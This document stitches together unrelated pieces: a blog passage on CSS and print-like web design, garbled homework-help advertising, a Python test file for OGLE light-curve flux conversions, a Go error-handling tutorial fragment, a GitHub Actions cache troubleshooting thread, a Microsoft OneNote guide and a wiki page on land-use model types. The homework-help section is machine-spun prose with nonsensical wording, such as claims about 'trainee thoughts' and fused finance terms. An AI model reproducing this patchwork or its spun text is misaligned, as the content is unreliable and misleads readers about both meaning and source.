Behavioral approaches aim at simulating the explicit behavior (such as marriage, birth, or re-location), whereas structure-explaining approaches attempt to simulate the outcome (such as population distribution) directly without dealing with the motivation that led population to be distributed in a certain way. Certainly, this distinction is simplifying and many models are somewhere between these two approaches. A common example for structure-explaining models is a Cellular Automata that simulates the state of a single raster cell based on the state of the surrounding raster cells. Cellular Automata models do not explain the change of a raster cell, but rather simulate the changed outcome. Another example are household evolution models and demographic models that frequently update a synthetic population to a future year without dealing explicitly with choices that lead to a future population. Structure-explaining models tend to be less sensitive to policy scenarios because behavior is not represented explicitly in the model. Behavioral models, in contrast, aim at modeling the decision-making process of households, businesses, developers, among others, that may result in structural changes.
# Bid-rent or discrete choice approach
A classic distinction in land use models is the bid-rent approach and the discrete-choice approach. The bid-rent theory was first proposed by Alonso. According to this theory, every actor on the land use market makes bids for a piece of land, and the bidder with the highest offer gets the land. Because of transportation costs, actors are willing to make higher bids for land in more central locations. Because most office firms value transportation costs more than most households, the office employment makes the higher bids in the city center, whereas households bid higher in the suburbs. The discrete-choice theory commonly calculates utilities used to model decisions. The most popular discrete-choice approach is the Logit Model, developed by Domencich and McFadden. Households, firms, and developers make choices among a finite set of alternatives. The utility of every choice is used to select one alternative; the higher the utility of a given alternative, the greater the probability this alternative will be selected. Not everyone chooses the best solution, but some deviation from the optimum distribution is realized.
An advantage of the bid-rent approach is that prices are simulated endogenously in the bidding process. A well-calibrated model generates realistic prices that represent well the highest bid made for every location. To reach the equilibrium price, the model needs to iterate until equilibrium prices are found and no one is willing to make a higher bid for any location. The bid-rent approach assumes market transparency and users who maximize their profit. The discrete-choice approach requires an additional land-price model, as prices are not updated automatically. Limited information is introduced explicitly in the discrete-choice approach by logit models: owing to the lack of time and money to analyze all alternatives as well as the result of personal preferences, habits, and prejudices, some users make seemingly non-optimal choices in logit models, which some argue is more realistic than the equilibrium outcome of bid-rent approaches. Overall, actors in the discrete-choice approach aim to satisfy their needs and not to maximize their profits.
Martinez (1992) has shown that the two approaches lead to similar model results. As a rule of thumb, bid-rent approaches work best in markets that are highly competitive and transparent. Discrete-choice approaches work better in markets that react with some time lag and in which users have to make decisions at a certain level of uncertainty.
# Aggregate or microscopic simulation
The third characteristic analyzed in this context is the distinction between aggregate and microsimulation land use models. Aggregate models cluster actors into certain groups, such as households by zone and by household type or firms by zone and by industry type. All actors in each group are assumed to have homogenous preferences. With a smaller number of groups, aggregate models store data efficiently and tend to have shorter run times. If more detail is added to the model, the handling of many groups may become cumbersome, and a disaggregated approach may become more appropriate. Disaggregate models store socio-economic data in a synthetic population that defines every individual separately (usually, the unit of analysis is a household). Orcutt (1960) introduced microsimulation. In the following decades, land use, travel demand and network models have been developed that simulate every actor individually. The great advantage of microsimulation is the explicit simulation of the interaction between individuals. Hägerstrand (1967) showed in his theory of spatial diffusion how innovations are spread from a single actor to other actors who live in spatial proximity. Individuals who received the innovation become a sender themselves, further spreading this innovation at the microscopic level. Nobel Prize laureate Schelling (1978) showed with the self-forming neighborhood model how microscopically simulated households choose more segregated locations than the aggregate segregation desire would suggest.
Microsimulation models allow storing complex data sets more efficiently. Often, microscopic approaches are easier to communicate, as describing the behavior of single actors is less abstract than describing the homogenous behavior of groups. Because microscopic models simulate individual interaction explicitly, model results tend to be more coherent with urban theory.
However, model developments focused on adding ever more detail do not necessarily lead to the best models. By adding detail, model run times may suffer and in some cases the complexity of the model may exceed time and budget allocated to the model development. Microsimulation models require a random number generator to simulate choices. With different random numbers in each model run, the results in every run are slightly different due to the stochastic variation. This difference is insignificant if a very large number of actors are simulated (such as a location choice of 1 million households). Stochastic variation makes model output invalid if the output is analyzed at a detailed level (such as location behavior of a hundred households of household type 1 in neighborhood A), as the stochastic variation may exceed the scenario impact.
Alonso, W. (1960) A theory of the urban land market. In: Papers and Proceedings of the Regional Science Association, Vol. 6, No. 1, pp. 149-157. ↩︎
Domencich, T.A. and D. McFadden (1975) Urban travel demand: a behavioral analysis. North-Holland Publishing, Amsterdam. ↩︎
Martinez, F.J. (1992) The bid-choice land-use model: an integrated economic framework. In: Environment and Planning A, Vol. 24, No. 6, pp. 871-885. ↩︎
Orcutt, G.H. (1960) Simulation of economic systems. In: American Economic Review, Vol. 50, No. 5, pp. 893-907. ↩︎
Hägerstrand, T. (1967) Innovation diffusion as a spatial process. The University of Chicago Press, Chicago. ↩︎
Schelling, T.C. (1978) Micromotives and macro behavior. W. W. Norton & Company, New York. Pages 147 ff. ↩︎
|
OPCFW_CODE
|
Metadata Property key always lowercase
Maybe its not a bug here in the sdk, but wenn i add some metadata in kamelcase and i get it back it will be in lowercase
-->
According to this: https://docs.microsoft.com/en-us/rest/api/storageservices/naming-and-referencing-containers--blobs--and-metadata#metadata-names
Metadata is supposed to preserve its case. I don't see anything in storage-blob that would make this be an intentional choice.
I think it may be caused by this line: https://github.com/Azure/azure-sdk-for-js/blob/4555a454b5effde0d7e52b39e6b4996861c4d8d1/sdk/core/core-http/src/httpHeaders.ts#L170
It seems odd that rawHeaders mutates the casing of headers. I'm not sure why this was done or if it would break anything to change it.
/cc @daviwil @bterlson @jeremymeng
This is a known issue due to the node-fetch behavior
Refer to https://github.com/Azure/azure-sdk-for-js/issues/4966 for past discussions.
@jeremymeng I see we added doc comments, but perhaps some additional docs in the README would help? It doesn't seem like we have a section/example on metadata at all.
Yes, I agree more samples would help. I am not sure README is the proper place though as there are too many features/topics in storage blobs to fit there. When storage is in its own repo there is wiki page. In mono-repo wiki page might not scale well.
It would be great to have a place to put FAQ/quirks/etc.
Quirks.md?
@XiaoningLiu - Do you have an update on this? It is currently 140 days old. Thanks, Jon
Thanks! @jongio The limitation is from HTTP clients (both node-fetch or previously axios) in Azure Core. One of steps in decision is to update JS doc about a warning for casing differences for Get Properties API. (see https://github.com/Azure/azure-sdk-for-js/pull/6308/files).
@jiacfan can you help check if further document work needed? Added you per CRI schedule.
Thanks for adding me.
In addition to "HTTP client's limitation" mentioned above, this is also related to HTTP's RFC, where header is declared to consists of a case-insensitive field name.
An optimization in service side is that blob tag is introduced, where both tag key&value are saved in case-sensitive pattern which is achieved through using headers' field value to save both tag's key&value, e.g. in PutBlob. Customer may choose to use metadata or tag according to scenarios. (Here is the section on choosing between metadata and blob indexed tag).
@bterlson @jongio @jeremymeng @xirzec to suggest if we need doc this in Readme or an additional .md file, besides the existing doc(https://github.com/Azure/azure-sdk-for-js/pull/6308/files).
.Net has also case insensitive support for metadata, we can find test code here and case insensitive dictionary comparison logic here. Close the issue as the doc documents are clear, and we can further optimize if there is further customer requirements.
@xirzec @jiacfan I know this is an old issue (and I don't have permissions to reactivate it), but I just want to express how frustrating this issue is for me and, I suspect other users of Azure Storage Explorer which, as you know, uses this SDK.
I work on an Azure service that uses the Storage SDK for .NET. The service writes blob metadata using mixed-case keys. For the metadata names, we use common two letter prefixes (e.g. "ds", "sp") followed by Pascal-cased symbols. e.g. "spTraceFormat". I often find myself investigating issues where I use Azure Storage Explorer to check the metadata on these blobs. I find it frustrating that the Storage Explorer displays the metadata names all in lower-case when I know that my .NET code wrote them using a specific case and the casing can round trip. It also means, if I choose to edit the metadata using Storage Explorer, then casing is lost.
I totally understand that one shouldn't rely on the casing of metadata. Yes, I get it: Lookups should be OrdinalIgnoreCase. But the displaying of metadata should preserve the casing that was returned from the storage service.
When I worked on the Visual Studio IDE, we had an issue where the Solution Explorer did not preserve the casing of files on disk -- e.g. you renamed one of your source files, changing only the casing, but Solution Explorer didn't update. Of course, it was a usability bug and we fixed it.
Imagine if Windows Explorer one day decided to list all your file and directory names in lower-case! Of course the Windows file systems (NTFS/DOS) doesn't care about casing, but users do. That would also be a bug.
Azure Storage Explorer is the odd one out. Apparently, it can't be fixed there because the casing is lost in the underlying Storage SDK for JS.
The Azure Portal preserves the casing and so does the .NET SDK, so the fault is not with the underlying REST API. This appears to be squarely an "SDK for JS" issue.
It is due to the behavior of our underlying http client dependencies. It looks that with core v2 moving to use NodeJS built-in https module, we should be able to preserve the casing. However, there isn't an ETA yet on when Storage will finish moving to core v2.
Hi, @jeremymeng (long time!) Thanks for re-opening this for consideration. Much appreciated.
Hi @pharring
Which interface do you use to get blob's metadata? Do you use the listing method, or the GetProperties method?
Thanks
Emma
I'm also using GetProperties to get metadata.
With azure-storage it was possible to set and retrieve upper-case words.
https://www.npmjs.com/package/azure-storage
Here we need to search for workarounds to use this functionality.
I came up with a workaround of using a custom HTTP Client targeting this specific scenario (retrieving metadata via Blob getProperties() methods).
For getProperties() calls I am creating a new instance of client that uses a custom HTTP Client.
const getPropertiesClient = new ContainerClient(
containerClient.url,
sharedKeyCredential,
{
httpClient: new ExampleHttpClient(),
}
);
const properties2 = await getPropertiesClient.getProperties();
output:
metadata retrieved:
{ _: 'underscore', camelcase: 'camelCaseValue', v: 'value' }
metadata retrieved with custom http client:
{ camelCase: 'camelCaseValue', v: 'value', _: 'underscore' }
Completed code:
https://gist.github.com/jeremymeng/36c8162b65fe8945c8dae59061d9ce1d
I have a workaround that does not need changes in the core library. For *Client.getProperties() we can use a custom http client to retrieve the metadata while preserving their casing.
const containerClient = serviceClient.getContainerClient(containerName);
const properties1 = await containerClient.getProperties();
console.log("metadata retrieved:");
console.log(properties1.metadata);
const getPropertiesClient = new ContainerClient(
containerClient.url,
sharedKeyCredential,
{
httpClient: new ExampleHttpClient(),
}
);
const properties2 = await getPropertiesClient.getProperties();
console.log("x-ms-meta retrieved with custom http client:");
console.log((properties2._response as any).xMsMeta);
Output:
metadata retrieved:
{ _: 'underscore', camelcase: 'camelCaseValue', v: 'value' }
x-ms-meta retrieved with custom http client:
{ camelCase: 'camelCaseValue', v: 'value', _: 'underscore' }
Complete code: https://gist.github.com/jeremymeng/36c8162b65fe8945c8dae59061d9ce1d
https://github.com/Azure/azure-sdk-for-js/issues/15594
Hello,
I'm seeing this issue and I'm making sure I understand it properly.
I have uploaded a lot of files via C# SDK into our Azure Blob Storage.
Here is the code I'm using to obtain the Metadata properties on a blob:
BlobProperties properties = await blobItem.GetPropertiesAsync().ConfigureAwait(false);
Our tester reported an issue with one file that it would not download. I realized this is a file I've managed directly via Azure Storage Explorer. I then realized the metadata key is coming back ask 'moduleid', when we saved it as 'moduleId'. We are expecting it to come back as 'moduleId' (upper case I), so code on up the chain will find it in our metadata list etc.
After reading this GitHub Issue, it seems like there is a setting on my desktop's Azure Storage Explorer app that is causing this?
Is this correct?
@ttaylor29 I would recommend not having your code be case sensitive with regards to checking metadata keys. Given that metadata are simply HTTP headers, there really is nothing in the HTTP spec that is ensuring you will get the same casing you used originally.
After reading this GitHub Issue, it seems like there is a setting on my desktop's Azure Storage Explorer app that is causing this?
No. More like: there is now a setting you can enable that will help prevent issues, but things still aren't perfect because AzCopy still does not maintain HTTP header casing.
|
GITHUB_ARCHIVE
|
This cheat sheet will guide you through the grammar , reminding dplyr you how to select, summarise, join data frames , mutate, group, filter, arrange tibbles. To select a column - Use the " : " sign to select a range of columns. The best cheat sheets are those that cheat you make yourself! We would like to show you a description here but the site won’ t allow us. The cheat sheet can be downloaded from RStudio cheat sheets repository. io/ r- cheatsheet. Data Transformation with dplyr : : CHEAT SHEET A B C A B C. dplyrXdf cheat sheet Using dplyr with out- of- memory data in Microsoft R Server Verbs dplyr verbs are S3 generics data tables, with methods provided for data frames, so on.
Apply the same function to several variables at once. allow R comments within regex' s ,/ to have. • l Al major single- two- table verbs supported as well as grouping. Use nest( ) to create a nested data frame with one row per group Species S. This video dives into using the # dplyr & # tidyr cheatsheets used. Why the cheatsheet. As a case study, let’ s look at the ggplot2. R cheat sheet dplyr. • Define methods for Microsoft R Server data source objects.
Examples for those of us who don’ t speak SQL so good. Cheat Sheets for AI Machine Learning, Neural Networks Deep Learning & Big Data The Most Complete List of Best dplyr AI Cheat Sheets. Cheatsheet for dplyr join functions. Selecting the right features in your data can mean the difference between mediocre performance with long training times and great performance with short training times. Get the Ultimate R Cheat Sheet here: business- science. R Syntax Comparison : : CHEAT SHEET Even within one syntax, there are o" en variations that are equally valid. This means dplyr is extensible.
View, download and print Base R Cheat Sheets pdf template or form online. 6 R Cheat Sheets are collected for any of your needs. R Cheat Sheets R Cheat Sheets Table of contents. Basics Advanced Edition & Reporting RMarkdown RStudio Specializations Caret Data mining data. table dplyr & tidyr Machine Learning Probabilities Quandl Regular Expressions ( regex) sjmisc Spark Strings Survival Analysis & Regression Time Series. Hadley Wickham' s dplyr package is an amazing tool for restructuring, filtering, and aggregating data sets using its elegant grammar of data manipulation.
r cheat sheet dplyr
By default, it works on in- memory data frames, which means you' re limited to the amount of data you can fit into R' s memory. This chapter introduces you to string manipulation in R.
|
OPCFW_CODE
|
Please tell us what happens when you try. If there is an error message, please give it exactly.
This is the message that comes up on the screen and stays there.
If this message is not eventually replaced by the proper contents of the document, your PDF
viewer may not be able to display this type of document.
You can upgrade to the latest version of Adobe Reader for Windows®, Mac, or Linux® by
For more assistance with Adobe Reader visit http://www.adobe.com/support/products/
Windows is either a registered trademark or a trademark of Microsoft Corporation in the United States and/or other countries. Mac is a trademark
of Apple Inc., registered in the United States and other countries. Linux is the registered trademark of Linus Torvalds in the U.S. and o
Ok, something is happening, and it isn't what you'd expect.
How are you looking at these forms
* Are you on Mac or Windows?
* Are you looking at the forms in your web browser, or something else?
* What is the web browser you are using?
* Do you have Adobe Reader on the system?
Are you running Linux, or using a non-Adobe PDF viewer (such as the inbuilt tools in Chrome or Firefox)?
That message typically appears when you try to display an XFA (LiveCycle) form and the software can't understand it - which implies that you're not seeing it inside Adobe Reader.
The new PDF viewer Built in to FireFox 19 and above PDF.js is Only a viewer it doesn't for now do forms, and may never seems Adobe is putting in stumbling blocks
On PC the Adobe PDF Viewer works On Windows Machines just Fine.
I am using Windows so this should not be the problem.
I downloaded the latest Adobe reader from the web site just incase ours was too old so this should have solved the problem according to the H.M.R.C. message I got.
Thanks anyway for your help.
In answer to your question,
1) I am using Windows.
2) I am using the web browser
3) I have Google chrome
4) I had Adobe but it was an older version so, as per H.M.R.C. message, I downloaded the latest version in case that was the problem.
Many thanks for your response
Ok, Google Chrome is the problem. It shows PDF files WITHOUT using Adobe Reader. To use Adobe Reader you will need to save the PDF file first; you can do this when it appears with the message "If this message is not eventually replaced..." Click the Save icon in the floating toolbar and save to your desktop.
NOW open the PDF, with Reader. It should work correctly.
It works wonderfully.
Sorry to trouble you but it was driving me crazy.
Mank thanks again
|
OPCFW_CODE
|
import * as fs from 'fs'
import * as Database from 'better-sqlite3'
import { Extract } from 'unzipper'
import { SqlNote } from './interfaces'
const unzip = (src: string, dst: string) => () => {
return fs
.createReadStream(src)
.pipe(Extract({ path: dst }))
.promise()
}
const findAll = (dbPath: string) => () => {
const db = new Database(dbPath)
const notes = db.prepare('SELECT * FROM notes').all()
return notes
}
const findOneRandomly = (dbPath: string) => () => {
const db = new Database(dbPath)
const note = db.prepare('SELECT * FROM notes ORDER BY RANDOM() LIMIT 1').get()
return note
}
const findOne = (dbPath: string, id: number) => () => {
const db = new Database(dbPath)
const stmt = db.prepare('SELECT * FROM notes WHERE id = ?')
return stmt.get(id)
}
const deserializeNote = (note: SqlNote) => {
return {
content: note.flds
}
}
export { unzip, findAll, findOne, deserializeNote, findOneRandomly }
|
STACK_EDU
|
Post:Marvellousfiction Fey Evolution Merchant novel Chapter 517 The Terrified Sacred Source Lifeforms cow whirl recommendp2
Amazingnovel Amber Button - Chapter 517– The Terrified Sacred Source Lifeforms ignore careful reading-p2
Novel - Fey Evolution Merchant - Fey Evolution Merchant
Chapter 517– The Terrified Sacred Source Lifeforms trees bawdy
Lin Yuan's brain was dizzy with anguish, and also it soon began to feel numb.
The discomfort of having his soul shattered could not be when compared with bodily soreness.
Because the bloodied point out of his hands and wrists when he had reached out for any sacred provider lifeforms, the contract-making method had immediately commenced.
After his spirit was cleansed, Lin Yuan never got a chance to see the two individual silhouettes in the depths of his heart and soul all over again.
The pain of obtaining his soul shattered could not actually be when compared with physiological suffering.
“You can perform it, Yuan!”
When he lurched frontward, he grabbed and swiped most of the resource-form lifeforms from the dimensional centre.
The pain was similar to the 1 he possessed knowledgeable while cleansing his soul of harmful particles at the Vibrant Moon Palace.
To produce things a whole lot worse, Lin Yuan also had to withstand the depleting experience that was included with obtaining the nature qi in the body siphoned out.
A single fretting hand as soon as the other closed in around the radiant spectrum ma.s.ses.
Not really the supple body between his fingers was spared.
But now, Lin Yuan's consciousness went back towards the depths of his spirit once more.
historical essays should
The Bud of Mountain Jade's restorative healing gentle persisted to work on Lin Yuan's seriously hurt palms.
The Wizard face mask that Lin Yuan was donning decreased from his face, as well as metallic cover up changed into a three-tailed bright cat.
What Lin Yuan found most appalling was which the two beautiful rainbow ma.s.ses had been melding using the two man silhouettes on the depths of his soul.
darth bane rule of two reddit
If one's spirit was not strong enough, it turned out highly possible that the sacred reference lifeforms would eliminate one's heart and soul.
Lin Yuan kept in mind that after the Moon Empress ended up being discussing the sacred supplier lifeforms, she got described that a person essential some help from a number of soul-nouris.h.i.+ng character materials as a way to successfully agreement the sacred provider lifeforms.
Not really the soft skin area between his hands and fingers was spared.
Section 517: The Scared Sacred Resource Lifeforms
The discomfort of obtaining his spirit shattered could not even be as compared to actual physical pain.
Wizard recognized that if it handled Lin Yuan, it would likely end up being the survive strand that induced Lin Yuan to collapse, effectively totally wasting all his time and effort.
The dimensional vigor in the dimensional centre was like sharp cutlery which are chopping apart each " of Lin Yuan's epidermis that has been on the dimensional center.
At that moment, Morbius lit up again.
It was subsequently already enough of a struggle for heart qi trained professionals to address from the experience of possessing their character qi siphoned out, considerably less after they essential to endure torturous agony too, like what Lin Yuan was carrying out.
Lin Yuan's neurological was dizzy with anguish, and yes it soon started to experience numb.
The soaring gravel was much like a bed furniture of pure cotton that gently cus.h.i.+oned his slip.
Chapter 517: The Scared Sacred Provider Lifeforms
The helplessness and suffering from getting exhausted of soul qi combined with the bloodstream damage from his fingers fragile him seriously.
What Lin Yuan uncovered most appalling was that this two shimmering rainbow ma.s.ses were actually melding together with the two human being silhouettes in the depths of his soul.
The dimensional energy from the dimensional center was like sharp cutlery which are cutting apart each inch of Lin Yuan's complexion that had been during the dimensional hub.
The flying fine sand was the original source Sand's technique of inspiring Lin Yuan.
Lin Yuan immediately experienced a numbing itch of pain on his palms.
Following his soul have been cleansed, Lin Yuan never experienced the ability to observe the two individual silhouettes in the depths of his soul all over again.
To begin with, the two soul silhouettes and sacred supplier lifeforms inside the depths of Lin Yuan's spirit denied to provide in.
|
OPCFW_CODE
|
User-friendly software for generating bioenergetics-based habitat suitability curves for drift-feeding fishes
Click on the links below to download a folder containing the program, program manual, and demo input files. Open the program by unzipping the folder and clicking on the “BioenergeticHSC.app” icon (for mac OS) or the “BioenergeticHSC.exe” (for Windows). The Windows version has been tested on Windows 10 and Windows 7. It should theoretically work on Windows 8 but this is not certain. The “Resources” folder contains the user manual and demo input files.
Download for Mac OSX (requires OS X 10.11.6 or newer)
Link to source Python code on GitHub: https://github.com/JasonNeuswanger/BioenergeticHSC
2019-10-11 BioenergeticHSC v1.0.0 released.
Background and rationale
Determining environmental flow needs – the quantity and timing of flow necessary to protect aquatic life in streams and rivers – is a key challenge for natural resource management agencies. The most common approach for predicting the impacts of altered flows on fish are variants of the Physical Habitat Simulation Model (PHABSIM), which combines a hydraulic habitat simulation model with a biological model that predicts how habitat quality changes with velocity and depth. Habitat Suitability Curves (HSCs) are the most common biological model used in PHABSIM frameworks. HSCs are generally empirically derived microhabitat models, where the frequency of use of velocity and depth by the target fish species is compared to the ambient velocity and depth distribution available in the environment to generate a preference curve (use relative to availability) that is standardized to a maximum of 1.
While intuitive, this approach has been widely criticized. Primary concerns include: (1) territorial displacement of subordinate fish into lower quality habitat at high densities can make frequency-of-use (density) a poor metric of habitat quality; (2) HSCs are poorly transferable across locations; and (3) suitability metrics lack a clear biological interpretation. Despite these criticisms, few viable alternatives are available; consequently, frequency-based HSCs continue to be used.
We have attempted to address this issue using drift-foraging bioenergetic models that predict energy intake for fishes that occupy fixed focal points in the water column to forage on drifting invertebrates (e.g., salmon and trout; Hughes and Dill 1990, Hayes et al. 2007). Drift-foraging models represent habitat quality as the net rate of energy intake (NREI; equivalent to growth rate potential), estimated as gross energy intake less energy costs of swimming and maneuvering to intercept prey at a given focal velocity and depth. Because these models are inherently mechanistic rather than empirical, they should provide a more rigorous measure of habitat quality, with a clear biological interpretation (energy gain) that is transferable across locations.
Generating mechanistic bioenergetics-based HSCs is a complicated and time-consuming process, which represents a significant barrier to their wider use. Our motivation was to improve this situation by developing user-friendly software to allow simple and straightforward generation of bioenergetics-based habitat suitability curves.
Overview of software
BioenergeticHSC is an open source modelling tool designed to generate bioenergetics-based habitat suitability curves. Users supply data on invertebrate drift and specify initial parameters including fish size, temperature, and turbidity; then, the program uses a net energy intake model to produce a 2D surface of bioenergetics-based habitat suitability.
These HSCs can be exported and used the same as traditional habitat suitability curves with common instream flow modelling platforms, e.g., PHABSIM. There are several other functionalities of the software, including computation of net energy intake, habitat suitability and intermediate metrics (e.g., swimming costs) on user-supplied depth and velocity data. A comprehensive manual accompanies the program to give details and guidance.
1). Flow assessments:
(a) Standard HSC use. The modelling tool can be used to generate bioenergetic-based HSCs for use in standard habitat simulation applications, i.e., to determine how habitat availability changes across a range of flows.
(b) Using net energy intake rate (NREI) as a direct index of habitat quality. Rather than converting NREI to HSCs to use in a physical habitat simulation model, the modelling tool can be used to directly calculate NREI at individual sampling points in a channel using measured velocity and depth values (i.e., using imported transect data). This will allow the mean and variance (or frequency distribution) of NREI to be used directly as an index of habitat quality, rather than relying on conversion of NREI to a HSC as an intermediate step.
2). Assessing variation in habitat capacity within and among streams:
PHABSIM combines HSCs with a hydraulic model to generate weighted usable area (WUA) - a relative index of available habitat in a specific stream or reach across different flows. While differences in WUA among streams may serve as a very rough metric of differences in habitat quality, the strength of this inference is weak because traditional frequency-based HSCs do not account for differences in biological productivity; i.e. traditional frequency-based HSCs generated in different streams are all standardized to a maximum of 1 (regardless of differences in fish density among streams), so that any differences in algal, microbial, and invertebrate prey abundance (driven by underlying geology or nutrient chemistry) are removed. In contrast, predicted NREI values explicitly incorporate differences in prey abundance (invertebrate drift), so that NREI integrates the effect of both physical habitat quality and biological production at the base of the food chain. This means that NREI can be used as a direct index of relative habitat capacity among streams.
3). Assessing the sensitivity of habitat quality to parameter variation. The modelling tool can be used to predict the relative effects of changes in key parameters (e.g., fish length or prey abundance) on habitat suitability and flow requirements. This sort of sensitivity analysis could be useful for assessing the potential effects of a variety of environmental impacts, including climate change.
We encourage users to familiarize themselves with the basics of drift-foraging theory to use this tool. Below are a few papers that give background on the approach used in this software.
Bioenergetics-based habitat suitability curves
Drift-foraging bioenergetics models
Spreadsheet tool to adjust existing HSCs
HSC right-shift tool for transforming focal HSCs to spatially-averaged ones.
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
For questions, contact: Sean Naman (email@example.com) or Jordan Rosenfeld (firstname.lastname@example.org)
|
OPCFW_CODE
|
Effective Java: Programming Language Guide
Make Quick Response Code In Java
Using Barcode generation for Java Control to generate, create QR Code image in Java applications.
performing operation sequences atomically Thread-safe classes, however, may be protected from this attack by the use of the private lock object idiom Using internal objects for locking is particularly suited to classes designed for inheritance (Item 15) such as the WorkQueue class in Item 49 If the superclass were to use its instances for locking, a subclass could unintentionally interfere with its operation By using the same lock for different purposes, the superclass and the subclass could end up stepping on each others' toes To summarize, every class should clearly document its thread-safety properties The only way to do this is to provide carefully worded prose descriptions The synchronized modifier plays no part in documenting the thread safety of a class It is, however, important for conditionally thread-safe classes to document which object must be locked to allow sequences of method invocations to execute atomically The description of a class's thread safety generally belongs in the class's documentation comment, but methods with special threadsafety properties should describe these properties in their own documentation comments
Barcode Generation In Java
Using Barcode generator for Java Control to generate, create barcode image in Java applications.
Item 53: Avoid thread groups
Scan Barcode In Java
Using Barcode reader for Java Control to read, scan read, scan image in Java applications.
Along with threads, locks, and monitors, a basic abstraction offered by the threading system is thread groups Thread groups were originally envisioned as a mechanism for isolating applets for security purposes They never really fulfilled this promise, and their security importance has waned to the extent that they aren't even mentioned in the seminal work on the Java 2 platform security model [Gong99] Given that thread groups don't provide any security functionality to speak of, what functionality do they provide To a first approximation, they allow you to apply Thread primitives to a bunch of threads at once Several of these primitives have been deprecated, and the remainder are infrequently used On balance, thread groups don't provide much in the way of useful functionality In an ironic twist, the ThreadGroup API is weak from a thread safety standpoint To get a list of the active threads in a thread group, you must invoke the enumerate method, which takes as a parameter an array large enough to hold all the active threads The activeCount method returns the number of active threads in a thread group, but there is no guarantee that this count will still be accurate once an array has been allocated and passed to the enumerate method If the array is too small, the enumerate method silently ignores any extra threads The API to get a list of the subgroups of a thread group is similarly flawed While these problems could have been fixed with the addition of new methods, they haven't been fixed because there is no real need; thread groups are largely obsolete To summarize, thread groups don't provide much in the way of useful functionality, and much of the functionality they do provide is flawed Thread groups are best viewed as an unsuccessful experiment, and you may simply ignore their existence If you are designing a class that deals with logical groups of threads, just store the Thread references comprising each logical group in an array or collection The alert reader may notice that this advice appears to contradict that of Item 30, Know and use the libraries In this instance, Item 30 is wrong
Encoding QR Code In Visual C#
Using Barcode maker for .NET framework Control to generate, create QR image in VS .NET applications.
Effective Java: Programming Language Guide
Creating QR-Code In VS .NET
Using Barcode creation for ASP.NET Control to generate, create Quick Response Code image in ASP.NET applications.
There is a minor exception to the advice that you should simply ignore thread groups One small piece of functionality is available only in the ThreadGroup API The ThreadGroupuncaughtException method is automatically invoked when a thread in the group throws an uncaught exception This method is used by the execution environment to respond appropriately to uncaught exceptions The default implementation prints a stack trace to the standard error stream You may occasionally wish to override this implementation, for example, to direct the stack trace to an application-specific log
Painting Denso QR Bar Code In .NET Framework
Using Barcode creation for Visual Studio .NET Control to generate, create QR Code JIS X 0510 image in Visual Studio .NET applications.
QR Code JIS X 0510 Generation In Visual Basic .NET
Using Barcode maker for VS .NET Control to generate, create QR Code image in .NET framework applications.
Data Matrix ECC200 Creation In Java
Using Barcode generator for Java Control to generate, create Data Matrix ECC200 image in Java applications.
Make ANSI/AIM Code 39 In Java
Using Barcode encoder for Java Control to generate, create Code 39 Extended image in Java applications.
USD-4 Drawer In Java
Using Barcode generator for Java Control to generate, create Ames code image in Java applications.
GS1 - 13 Creation In VS .NET
Using Barcode creation for .NET Control to generate, create EAN-13 Supplement 5 image in .NET framework applications.
Code 39 Extended Creation In .NET Framework
Using Barcode generation for ASP.NET Control to generate, create Code39 image in ASP.NET applications.
Code 128B Encoder In Visual Studio .NET
Using Barcode drawer for ASP.NET Control to generate, create Code 128 image in ASP.NET applications.
|
OPCFW_CODE
|
Selecting the right version of Internet Explorer 9 Internet Explorer 9 is available for Windows Vista, Windows 7, Windows Server 2008 R2. Here Are 5 Ways to Fix It Article Getting a "Limited or no connectivity" error or in Windows? Check them off on the list of potential updates. 8 Click "Review and install updates." You can find this option at the top of the page. You’ll be auto redirected in 1 second. this contact form
We’ll have to assume that eventually Microsoft will offer IE9 through Windows Update, but for the moment, you’ll need to click the following link to download IE9. Follow these steps to install Internet Explorer 9 on your computer. Such behavior exposes you to many risks and it makes it easy for others to steal your financial data like your credit card details and use it to harm you. Signing custom browser package files Digital signatures identify the source of programs, and guarantee that the code has not changed since it was signed.
Click View installed updates in the left pane. Tutorial by Ciprian Adrian Rusen published on 01/02/2017 When you look at the technical specifications for modern gaming keyboards and mice, do you notice that many manufacturers provide life span estimations For more information about GPO and software deployments, see: http://go.microsoft.com/fwlink/?LinkId=157972.
The screen which pops up will tell you exactly which version (and if it’s 32- or 64-bit) your PC has. March 15, 2011 Dusty IE9 is great. The stand alone installer is no longer available unless you are on Vista or Server 2008. Update Internet Explorer 9 When I restarted IE9, it prompted me to reopen my tabs.
Just drag the tab for any site to the taskbar, and voila! Upgrade Internet Explorer 10 A browser window will open at the Microsoft Update Catalog Web site. How Rude!?! April 2, 2011 Sorenger IE 9 is BEST.
March 15, 2011 Ja5087 @Ali I agree March 15, 2011 Geek Hillbilly As with any IE version,I trust it about as far as I can throw a loaded coal truck.I'll wait Steps Method 1 IE10 1 Open your Internet Explorer browser. How To Install Internet Explorer 9 On Windows 7 64 Bit Then they should be made to watch all episodes of Stargate. How To Update Internet Explorer 8 Depending on the operating systems that users are running and how their security levels are set, Internet Explorer 9 might prevent users from (or warn them against) downloading programs that are
Desperately trying to make it smaller again. weblink Of course, it is also possible for you to choose the language of the browser. Make sure the one for Classic View has been selected. March 16, 2011 Woot Meh, I dunno. Update Internet Explorer 11
